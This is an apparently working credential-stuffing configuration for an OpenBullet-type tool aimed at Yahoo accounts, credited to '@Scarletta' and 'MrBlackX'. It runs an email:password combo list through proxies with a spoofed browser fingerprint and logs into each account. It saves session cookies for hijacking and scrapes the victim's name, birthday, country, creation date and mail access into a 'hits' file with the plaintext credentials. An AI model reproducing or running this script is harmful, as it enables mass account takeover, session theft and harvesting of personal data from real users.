[SETTINGS]
{
  "Name": "YAHOO",
  "SuggestedBots": 10,
  "MaxCPM": 0,
  "LastModified": "2021-03-30T07:42:32.6796905+08:00",
  "AdditionalInfo": "🍪 COOKIES | 💰 CAPTURE",
  "RequiredPlugins": [],
  "Author": "@Scarletta",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#RandomUA FUNCTION GetRandomUA -> VAR "ua" 

#GetStuff REQUEST GET "https://login.yahoo.com/" 
  
  HEADER "Host: login.yahoo.com" 
  HEADER "User-Agent: <ua>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://de.yahoo.com/?guccounter=1" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: " 

#Acrumb PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"acrumb\" value=\"" "\" />" -> VAR "acrumb" 

#Crumb PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"crumb\" value=\"" "\" />" -> VAR "crumb" 

#SessionIndex PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"sessionIndex\" value=\"" "\" />" -> VAR "sessionIndex" 

#Length FUNCTION Length "browser-fp-data=%7B%22language%22%3A%22en-US%22%2C%22colorDepth%22%3A24%2C%22deviceMemory%22%3A%22unknown%22%2C%22pixelRatio%22%3A1%2C%22hardwareConcurrency%22%3A2%2C%22timezoneOffset%22%3A-60%2C%22timezone%22%3A%22Europe%2FLondon%22%2C%22sessionStorage%22%3A1%2C%22localStorage%22%3A1%2C%22indexedDb%22%3A1%2C%22cpuClass%22%3A%22unknown%22%2C%22platform%22%3A%22Win32%22%2C%22doNotTrack%22%3A%22unspecified%22%2C%22plugins%22%3A%7B%22count%22%3A0%2C%22hash%22%3A%2224700f9f1986800ab4fcc880530dd0ed%22%7D%2C%22canvas%22%3A%22canvas%20winding%3Ayes~canvas%22%2C%22webgl%22%3A1%2C%22webglVendorAndRenderer%22%3A%22Google%20Inc.~ANGLE%20(Microsoft%20Basic%20Render%20Driver%20Direct3D11%20vs_5_0%20ps_5_0)%22%2C%22adBlock%22%3A0%2C%22hasLiedLanguages%22%3A0%2C%22hasLiedResolution%22%3A0%2C%22hasLiedOs%22%3A0%2C%22hasLiedBrowser%22%3A0%2C%22touchSupport%22%3A%7B%22points%22%3A0%2C%22event%22%3A0%2C%22start%22%3A0%7D%2C%22fonts%22%3A%7B%22count%22%3A32%2C%22hash%22%3A%229ad7c2bdeb9564b4cabbeeca7be750a3%22%7D%2C%22audio%22%3A%2235.7383295930922%22%2C%22resolution%22%3A%7B%22w%22%3A%221410%22%2C%22h%22%3A%22958%22%7D%2C%22availableResolution%22%3A%7B%22w%22%3A%22918%22%2C%22h%22%3A%221410%22%7D%2C%22ts%22%3A%7B%22serve%22%3A1617048632817%2C%22render%22%3A1617048633363%7D%7D&crumb=<crumb>&acrumb=<acrumb>&sessionIndex=<sessionIndex>&displayName=&deviceCapability=%7B%22pa%22%3A%7B%22status%22%3Afalse%7D%7D&username=<USER>&passwd=&signin=Weiter&persistent=y" -> VAR "length" 

#Email REQUEST POST "https://login.yahoo.com/?.src=fpctx&.intl=de&.lang=de-DE&.done=https://de.yahoo.com&pspid=2142153770" 
  CONTENT "browser-fp-data=%7B%22language%22%3A%22en-US%22%2C%22colorDepth%22%3A24%2C%22deviceMemory%22%3A%22unknown%22%2C%22pixelRatio%22%3A1%2C%22hardwareConcurrency%22%3A2%2C%22timezoneOffset%22%3A-60%2C%22timezone%22%3A%22Europe%2FLondon%22%2C%22sessionStorage%22%3A1%2C%22localStorage%22%3A1%2C%22indexedDb%22%3A1%2C%22cpuClass%22%3A%22unknown%22%2C%22platform%22%3A%22Win32%22%2C%22doNotTrack%22%3A%22unspecified%22%2C%22plugins%22%3A%7B%22count%22%3A0%2C%22hash%22%3A%2224700f9f1986800ab4fcc880530dd0ed%22%7D%2C%22canvas%22%3A%22canvas%20winding%3Ayes~canvas%22%2C%22webgl%22%3A1%2C%22webglVendorAndRenderer%22%3A%22Google%20Inc.~ANGLE%20(Microsoft%20Basic%20Render%20Driver%20Direct3D11%20vs_5_0%20ps_5_0)%22%2C%22adBlock%22%3A0%2C%22hasLiedLanguages%22%3A0%2C%22hasLiedResolution%22%3A0%2C%22hasLiedOs%22%3A0%2C%22hasLiedBrowser%22%3A0%2C%22touchSupport%22%3A%7B%22points%22%3A0%2C%22event%22%3A0%2C%22start%22%3A0%7D%2C%22fonts%22%3A%7B%22count%22%3A32%2C%22hash%22%3A%229ad7c2bdeb9564b4cabbeeca7be750a3%22%7D%2C%22audio%22%3A%2235.7383295930922%22%2C%22resolution%22%3A%7B%22w%22%3A%221410%22%2C%22h%22%3A%22958%22%7D%2C%22availableResolution%22%3A%7B%22w%22%3A%22918%22%2C%22h%22%3A%221410%22%7D%2C%22ts%22%3A%7B%22serve%22%3A1617048632817%2C%22render%22%3A1617048633363%7D%7D&crumb=<crumb>&acrumb=<acrumb>&sessionIndex=<sessionIndex>&displayName=&deviceCapability=%7B%22pa%22%3A%7B%22status%22%3Afalse%7D%7D&username=<USER>&passwd=&signin=Weiter&persistent=y" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "User-Agent: <ua>" 
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://login.yahoo.com/?.src=fpctx&.intl=de&.lang=de-DE&.done=https://de.yahoo.com&pspid=2142153770" 
  HEADER "content-type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "Content-Length: <length>" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Connection: keep-alive" 

#Check KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "INVALID_USERNAME" 
  KEYCHAIN Retry OR 
    KEY "recaptcha" 
  KEYCHAIN Success OR 
    KEY "account/challenge/password" 

#Length2 FUNCTION Length "browser-fp-data=%7B%22language%22%3A%22en-US%22%2C%22colorDepth%22%3A24%2C%22deviceMemory%22%3A%22unknown%22%2C%22pixelRatio%22%3A1%2C%22hardwareConcurrency%22%3A2%2C%22timezoneOffset%22%3A-60%2C%22timezone%22%3A%22Europe%2FLondon%22%2C%22sessionStorage%22%3A1%2C%22localStorage%22%3A1%2C%22indexedDb%22%3A1%2C%22cpuClass%22%3A%22unknown%22%2C%22platform%22%3A%22Win32%22%2C%22doNotTrack%22%3A%22unspecified%22%2C%22plugins%22%3A%7B%22count%22%3A0%2C%22hash%22%3A%2224700f9f1986800ab4fcc880530dd0ed%22%7D%2C%22canvas%22%3A%22canvas+winding%3Ayes%7Ecanvas%22%2C%22webgl%22%3A1%2C%22webglVendorAndRenderer%22%3A%22Google+Inc.%7EANGLE+%28Microsoft+Basic+Render+Driver+Direct3D11+vs_5_0+ps_5_0%29%22%2C%22adBlock%22%3A0%2C%22hasLiedLanguages%22%3A0%2C%22hasLiedResolution%22%3A0%2C%22hasLiedOs%22%3A0%2C%22hasLiedBrowser%22%3A0%2C%22touchSupport%22%3A%7B%22points%22%3A0%2C%22event%22%3A0%2C%22start%22%3A0%7D%2C%22fonts%22%3A%7B%22count%22%3A32%2C%22hash%22%3A%229ad7c2bdeb9564b4cabbeeca7be750a3%22%7D%2C%22audio%22%3A%2235.7383295930922%22%2C%22resolution%22%3A%7B%22w%22%3A%221410%22%2C%22h%22%3A%22958%22%7D%2C%22availableResolution%22%3A%7B%22w%22%3A%22918%22%2C%22h%22%3A%221410%22%7D%2C%22ts%22%3A%7B%22serve%22%3A1617049396319%2C%22render%22%3A1617049396895%7D%7D&crumb=<crumb>&acrumb=<acrumb>&sessionIndex=<sessionIndex>&displayName=<USER>&username=<USER>&passwordContext=normal&isShowButtonClicked=&showButtonStatus=&prefersReducedMotion=true&password=<PASS>&verifyPassword=Weiter" -> VAR "length2" 

#Password REQUEST POST "https://login.yahoo.com/account/challenge/password?.intl=de&.lang=de-DE&pspid=2142153770&src=fpctx&done=https://de.yahoo.com/&sessionIndex=<sessionIndex>&acrumb=<acrumb>&display=login&authMechanism=primary" 
  CONTENT "browser-fp-data=%7B%22language%22%3A%22en-US%22%2C%22colorDepth%22%3A24%2C%22deviceMemory%22%3A%22unknown%22%2C%22pixelRatio%22%3A1%2C%22hardwareConcurrency%22%3A2%2C%22timezoneOffset%22%3A-60%2C%22timezone%22%3A%22Europe%2FLondon%22%2C%22sessionStorage%22%3A1%2C%22localStorage%22%3A1%2C%22indexedDb%22%3A1%2C%22cpuClass%22%3A%22unknown%22%2C%22platform%22%3A%22Win32%22%2C%22doNotTrack%22%3A%22unspecified%22%2C%22plugins%22%3A%7B%22count%22%3A0%2C%22hash%22%3A%2224700f9f1986800ab4fcc880530dd0ed%22%7D%2C%22canvas%22%3A%22canvas+winding%3Ayes%7Ecanvas%22%2C%22webgl%22%3A1%2C%22webglVendorAndRenderer%22%3A%22Google+Inc.%7EANGLE+%28Microsoft+Basic+Render+Driver+Direct3D11+vs_5_0+ps_5_0%29%22%2C%22adBlock%22%3A0%2C%22hasLiedLanguages%22%3A0%2C%22hasLiedResolution%22%3A0%2C%22hasLiedOs%22%3A0%2C%22hasLiedBrowser%22%3A0%2C%22touchSupport%22%3A%7B%22points%22%3A0%2C%22event%22%3A0%2C%22start%22%3A0%7D%2C%22fonts%22%3A%7B%22count%22%3A32%2C%22hash%22%3A%229ad7c2bdeb9564b4cabbeeca7be750a3%22%7D%2C%22audio%22%3A%2235.7383295930922%22%2C%22resolution%22%3A%7B%22w%22%3A%221410%22%2C%22h%22%3A%22958%22%7D%2C%22availableResolution%22%3A%7B%22w%22%3A%22918%22%2C%22h%22%3A%221410%22%7D%2C%22ts%22%3A%7B%22serve%22%3A1617049396319%2C%22render%22%3A1617049396895%7D%7D&crumb=<crumb>&acrumb=<acrumb>&sessionIndex=<sessionIndex>&displayName=<USER>&username=<USER>&passwordContext=normal&isShowButtonClicked=&showButtonStatus=&prefersReducedMotion=true&password=<PASS>&verifyPassword=Weiter" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.yahoo.com" 
  HEADER "User-Agent: <ua>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://login.yahoo.com/account/challenge/password?.intl=de&.lang=de-DE&pspid=2142153770&src=fpctx&done=https%3A%2F%2Fde.yahoo.com%2F&sessionIndex=Qg--&acrumb=iZMYd9bR&display=login&authMechanism=primary" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Content-Length: <length2>" 
  HEADER "Origin: https://login.yahoo.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 

#Check2 KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Passwort ungültig. Versuchen Sie es bitte noch einmal" 
  KEYCHAIN Success OR 
    KEY "Abmelden" 

#Cookies UTILITY File "Cookies\\\\[YAHOO]-COOKIES-[<USER>].json" WriteLines "[{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"OTH\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(OTH)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"true\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"T\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(T)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"true\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"http://.yahoo.com/\",\\n \"Name raw\": \"F\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(F)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Any type of connection\",\\n \"Send for raw\": \"false\",\\n \"HTTP only raw\": \"true\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"http://.yahoo.com/\",\\n \"Name raw\": \"PH\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(PH)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Any type of connection\",\\n \"Send for raw\": \"false\",\\n \"HTTP only raw\": \"false\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"Y\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(Y)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"false\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.login.yahoo.com/\",\\n \"Name raw\": \"FS\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(FS)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"true\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"GUCS\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(GUCS)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"false\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.login.yahoo.com/\",\\n \"Name raw\": \"AS\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(AS)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"true\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"A1\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(A1)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"true\",\\n \"SameSite raw\": \"lax\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"A3\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(A3)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"true\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"A1S\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(A1S)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"false\",\\n \"SameSite raw\": \"lax\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"http://.yahoo.com/\",\\n \"Name raw\": \"B\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(B)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Any type of connection\",\\n \"Send for raw\": \"false\",\\n \"HTTP only raw\": \"false\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n},\\n{\\n \"Host raw\": \"https://.yahoo.com/\",\\n \"Name raw\": \"GUC\",\\n \"Path raw\": \"/\",\\n \"Content raw\": \"<COOKIES(GUC)>\",\\n \"Expires\": \"At the end of the session\",\\n \"Expires raw\": \"0\",\\n \"Send for\": \"Encrypted connections only\",\\n \"Send for raw\": \"true\",\\n \"HTTP only raw\": \"false\",\\n \"SameSite raw\": \"no_restriction\",\\n \"This domain only\": \"Valid for subdomains\",\\n \"This domain only raw\": \"false\",\\n \"Store raw\": \"firefox-default\",\\n \"First Party Domain\": \"\"\\n}]" -> CAP "Cookies" 

#Data REQUEST GET "https://login.yahoo.com/account/personalinfo" 
  
  HEADER "User-Agent: <ua>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 

#Birth PARSE "<SOURCE>" LR "<div class=\"txt\" id=\"txt-birthfield\">" "</div>" -> VAR "birth" 

#Birthday FUNCTION Replace "[ \\t\\n\\t ]+" "" "<birth>" -> CAP "Geburtstag" 

#Firstname PARSE "<SOURCE>" LR "<div class=\"txt u-name editable\" id=\"txt-first-name\">" "</div>" -> CAP "Vorname" 

#Lastname PARSE "<SOURCE>" LR "<div class=\"txt u-name editable\" id=\"txt-last-name\">" "</div>" -> CAP "Nachname" 

#Mailcheck REQUEST GET "https://mail.yahoo.com/?.intl=de&.lang=de-DE" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://login.yahoo.com/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 

IF "<SOURCE>" Contains "Vorhandene Postfächer zu Yahoo Mail hinzufügen"
JUMP #NOMAILACCESS
ELSE
IF "<USER>" Contains "yahoo"
JUMP #MAILACCESS
ENDIF
IF "<USER>" Contains "gmail"
JUMP #MAILACCESS
ENDIF
IF "<USER>" Contains "aol"
JUMP #MAILACCESS
ENDIF
IF "<USER>" Contains "outlook"
JUMP #MAILACCESS
ENDIF
ENDIF
#MAILACCESS
SET CAP "MAILACCESS" "✅"
#NOMAILACCESS
SET CAP "MAILACCESS" "❌"

#Country REQUEST GET "https://login.yahoo.com/account/preferences" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://login.yahoo.com/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 

#Temp PARSE "<SOURCE>" LR "<select name=\"preferenceLang\" id=\"language-dropdown\" data-lang=\"" "data-translation-lang=\"" -> VAR "CC" 

#Country_Code PARSE "<CC>" LR "-" "\"" -> CAP "Country" 

#Activity REQUEST GET "https://login.yahoo.com/account/activity" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://login.yahoo.com/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Connection: keep-alive" 
  HEADER "Cache-Control: max-age=0" 

#Creation_Date PARSE "<SOURCE>" LR "<p class=\"recent-account-access-date\">" "</p>" -> VAR "out" 

#AddList UTILITY Variable "out" Split " " -> VAR "SPLIT" 

#Fix FUNCTION Replace "," "" "<SPLIT[2]>" -> VAR "fix" 

IF "<fix>" EqualTo "Januar"
SET VAR "fix" "January"
ENDIF
IF "<fix>" EqualTo "Februar"
SET VAR "fix" "February"
ENDIF
IF "<fix>" EqualTo "März"
SET VAR "fix" "March"
ENDIF
IF "<fix>" EqualTo "Mai"
SET VAR "fix" "May"
ENDIF
IF "<fix>" EqualTo "Juni"
SET VAR "fix" "June"
ENDIF
IF "<fix>" EqualTo "Juli"
SET VAR "fix" "July"
ENDIF
IF "<fix>" EqualTo "Oktober"
SET VAR "fix" "October"
ENDIF
IF "<fix>" EqualTo "Dezember"
SET VAR "fix" "December"
ENDIF
SET CAP "Creation" "<fix>|<SPLIT[3]>|<SPLIT[4]>"

#Hits UTILITY File "Yahoo-Hits.txt" AppendLines "👑 ~ ~ ~ ~ < 💚 Y A H O O 💚 > ~ ~ ~ ~ 👑\\n\\n⭐️ Combo : <USER>:<PASS>\\n👤 Full Name : <Vorname>, <Nachname>\\n🌎 Country : <Country>\\n🎉 Birthday : <Geburtstag>\\n📅 Create Date : <Creation>\\n📧 E-Mail Access : <MAILACCESS>\\n🍪 Cookies : Yes (Cookies\\[YAHOO]-COOKIES-[<USER>].json)\\n🔒 Login : https://login.yahoo.com/\\n⚡️ Config By MrBlackX ⚡️\\n\\n👑 ~ ~ ~ ~ < 💚 C O N F I G 💚 > ~ ~ ~ ~ 👑\\n" -> CAP "Hits" 